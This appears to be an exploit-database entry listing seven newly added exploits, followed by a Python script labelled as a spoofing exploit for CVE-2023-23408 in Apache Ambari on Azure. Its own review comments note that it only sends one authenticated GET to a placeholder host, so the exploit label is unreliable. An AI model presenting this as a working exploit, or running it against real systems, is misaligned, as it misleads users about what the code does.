
7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
#   Microsoft
#   Apache Ambari
#   Microsoft Azure HDInsight
# Tested on: Windows/Linux
# CVE : CVE-2023-23408

import requests
# Endpoint and request headers for the Ambari REST API call made below.
# The host "ambari.example.com", the "cluster_name" path segment and the
# Basic value look like placeholders rather than live data.
# NOTE(review): HTTP Basic is only base64-encoded "user:password", i.e. a
# reversible encoding; a real credential should be loaded at runtime and
# never committed next to the script.
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {
    "X-Requested-By": "ambari",
    "Authorization": "Basic abcdefghijklmnop",
}
# Local sanity check of the outgoing header set
def validate_headers(headers):
    """Return True only if *headers* carries the two expected values.

    This is a client-side self-check against constants written in this
    function; it compares the mapping with fixed strings and says nothing
    about whether the server would accept the request.

    Args:
        headers: mapping of header name to header value.

    Returns:
        True when "X-Requested-By" equals "ambari" and "Authorization"
        equals the fixed Basic string, otherwise False.
    """
    required = (
        ("X-Requested-By", "ambari"),
        ("Authorization", "Basic abcdefghijklmnop"),
    )
    for header_name, wanted in required:
        # A missing header and a mismatched value are both rejected.
        if header_name not in headers or headers[header_name] != wanted:
            return False
    return True
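# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
    """Send one GET to *url* with *headers* and print the outcome.

    The headers are first passed through validate_headers(); if that
    returns False the function prints "Invalid headers" and sends nothing.
    Otherwise it prints "Request successful" for HTTP 200 and
    "Request failed" for any other status.

    NOTE(review): the file header labels this a spoofing exploit for
    CVE-2023-23408, but this function only issues a single authenticated
    GET and reports whether the status was 200. Nothing in it demonstrates
    or detects that issue, so a 200 here is not evidence that a host is
    affected.

    Args:
        url: full URL of the Ambari REST endpoint to query.
        headers: mapping of HTTP request headers to send.

    Returns:
        None. Results are reported on stdout only.
    """
    if not validate_headers(headers):
        print("Invalid headers")
        return

    try:
        # Without a timeout requests.get() can block indefinitely on an
        # unresponsive host. TLS certificate verification is left at the
        # library default (enabled).
        response = requests.get(url, headers=headers, timeout=10)
    except requests.RequestException as exc:
        # Connection, TLS and timeout errors are reported, not raised as
        # a traceback.
        print(f"Request failed: {exc}")
        return

    if response.status_code == 200:
        print("Request successful")
    else:
        print("Request failed")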
# Script entry: issue the single request using the module-level url and
# headers defined above. This runs whenever the file is executed or imported.
send_request(url=url, headers=headers)